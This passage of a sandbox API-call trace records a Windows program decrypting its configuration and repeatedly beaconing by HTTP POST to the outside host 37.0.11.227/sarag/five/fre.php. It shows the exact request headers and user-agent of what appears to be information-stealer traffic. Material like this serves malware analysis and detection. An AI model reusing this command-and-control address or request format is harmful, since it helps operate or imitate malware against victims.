out: hHeap=0x690000) returned 1 [0252.276] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1480) returned 0x714 [0252.279] Sleep (dwMilliseconds=0xea60) [0252.280] GetProcessHeap () returned 0x690000 [0252.280] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0252.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.282] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0252.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.290] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0252.297] GetProcessHeap () returned 0x690000 [0252.297] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0252.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.298] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0252.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.299] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.300] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.300] GetProcessHeap () returned 0x690000 [0252.300] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0252.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.301] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0252.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.302] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0252.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.303] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0252.303] GetProcessHeap () returned 0x690000 [0252.303] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0252.309] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.309] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0252.310] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.310] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0252.312] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.312] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0252.313] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.313] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0252.313] GetProcessHeap () returned 0x690000 [0252.313] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0252.313] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0252.313] GetProcessHeap () returned 0x690000 [0252.314] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0252.314] GetProcessHeap () returned 0x690000 [0252.314] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0252.314] GetProcessHeap () returned 0x690000 [0252.314] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0252.314] GetProcessHeap () returned 0x690000 [0252.314] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0252.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.316] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0252.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.320] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0252.325] GetProcessHeap () returned 0x690000 [0252.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0252.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.326] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0252.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.327] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.329] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.329] GetProcessHeap () returned 0x690000 [0252.330] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0252.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.332] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0252.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.333] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0252.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.335] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0252.335] GetProcessHeap () returned 0x690000 [0252.335] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0252.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.336] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0252.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.337] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0252.338] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.338] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0252.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.339] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0252.339] GetProcessHeap () returned 0x690000 [0252.339] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0252.339] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0252.339] GetProcessHeap () returned 0x690000 [0252.339] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0252.339] socket (af=2, type=1, protocol=6) returned 0x718 [0252.340] connect (s=0x718, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0252.368] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0252.368] GetProcessHeap () returned 0x690000 [0252.368] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0252.369] GetProcessHeap () returned 0x690000 [0252.369] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0252.369] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0252.370] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0252.370] GetProcessHeap () returned 0x690000 [0252.370] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0252.370] GetProcessHeap () returned 0x690000 [0252.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0252.371] GetProcessHeap () returned 0x690000 [0252.371] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0252.371] GetProcessHeap () returned 0x690000 [0252.371] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0252.371] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0252.372] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0252.372] GetProcessHeap () returned 0x690000 [0252.372] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0252.372] GetProcessHeap () returned 0x690000 [0252.373] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0252.373] send (s=0x718, buf=0x6ad508*, len=242, flags=0) returned 242 [0252.373] send (s=0x718, buf=0x6aba40*, len=159, flags=0) returned 159 [0252.373] GetProcessHeap () returned 0x690000 [0252.373] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0252.373] recv (in: s=0x718, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0252.451] GetProcessHeap () returned 0x690000 [0252.451] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0252.451] GetProcessHeap () returned 0x690000 [0252.451] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0252.451] GetProcessHeap () returned 0x690000 [0252.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0252.452] GetProcessHeap () returned 0x690000 [0252.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0252.452] closesocket (s=0x718) returned 0 [0252.454] GetProcessHeap () returned 0x690000 [0252.454] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0252.454] GetProcessHeap () returned 0x690000 [0252.455] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0252.456] GetProcessHeap () returned 0x690000 [0252.456] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0252.456] GetProcessHeap () returned 0x690000 [0252.456] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0252.457] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1488) returned 0x718 [0252.458] Sleep (dwMilliseconds=0xea60) [0252.460] GetProcessHeap () returned 0x690000 [0252.460] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0252.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.462] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0252.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.470] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0252.477] GetProcessHeap () returned 0x690000 [0252.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0252.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.478] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0252.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.479] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.480] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.480] GetProcessHeap () returned 0x690000 [0252.480] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0252.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.481] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0252.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.482] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0252.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.483] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0252.483] GetProcessHeap () returned 0x690000 [0252.483] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0252.484] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.484] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0252.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.485] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0252.489] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.489] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0252.490] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.490] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0252.490] GetProcessHeap () returned 0x690000 [0252.490] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0252.490] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0252.491] GetProcessHeap () returned 0x690000 [0252.491] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0252.491] GetProcessHeap () returned 0x690000 [0252.491] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0252.492] GetProcessHeap () returned 0x690000 [0252.492] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0252.492] GetProcessHeap () returned 0x690000 [0252.492] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0252.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.493] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0252.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.499] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0252.515] GetProcessHeap () returned 0x690000 [0252.515] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0252.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.517] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0252.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.518] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.519] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.519] GetProcessHeap () returned 0x690000 [0252.520] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0252.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.521] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0252.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.522] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0252.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.523] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0252.523] GetProcessHeap () returned 0x690000 [0252.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0252.524] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.524] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0252.525] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.526] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0252.526] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.527] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0252.527] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0252.528] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0252.528] GetProcessHeap () returned 0x690000 [0252.528] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0252.528] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0252.528] GetProcessHeap () returned 0x690000 [0252.528] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0252.528] socket (af=2, type=1, protocol=6) returned 0x71c [0252.528] connect (s=0x71c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0252.557] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0252.557] GetProcessHeap () returned 0x690000 [0252.557] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0252.557] GetProcessHeap () returned 0x690000 [0252.558] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0252.558] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0252.559] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0252.559] GetProcessHeap () returned 0x690000 [0252.559] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0252.559] GetProcessHeap () returned 0x690000 [0252.560] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0252.560] GetProcessHeap () returned 0x690000 [0252.560] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0252.560] GetProcessHeap () returned 0x690000 [0252.560] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0252.561] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0252.562] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0252.562] GetProcessHeap () returned 0x690000 [0252.562] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0252.562] GetProcessHeap () returned 0x690000 [0252.562] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0252.562] send (s=0x71c, buf=0x6ad508*, len=242, flags=0) returned 242 [0252.563] send (s=0x71c, buf=0x6aba40*, len=159, flags=0) returned 159 [0252.563] GetProcessHeap () returned 0x690000 [0252.563] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0252.563] recv (in: s=0x71c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0252.709] GetProcessHeap () returned 0x690000 [0252.710] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0252.710] GetProcessHeap () returned 0x690000 [0252.710] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0252.710] GetProcessHeap () returned 0x690000 [0252.710] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0252.710] GetProcessHeap () returned 0x690000 [0252.711] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0252.711] closesocket (s=0x71c) returned 0 [0252.713] GetProcessHeap () returned 0x690000 [0252.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0252.713] GetProcessHeap () returned 0x690000 [0252.714] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0252.714] GetProcessHeap () returned 0x690000 [0252.714] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0252.714] GetProcessHeap () returned 0x690000 [0252.714] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0252.719] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1490) returned 0x71c [0252.721] Sleep (dwMilliseconds=0xea60) [0252.722] GetProcessHeap () returned 0x690000 [0252.722] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0252.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.724] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0252.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.731] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0252.847] GetProcessHeap () returned 0x690000 [0252.847] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0252.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0252.849] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0252.849] 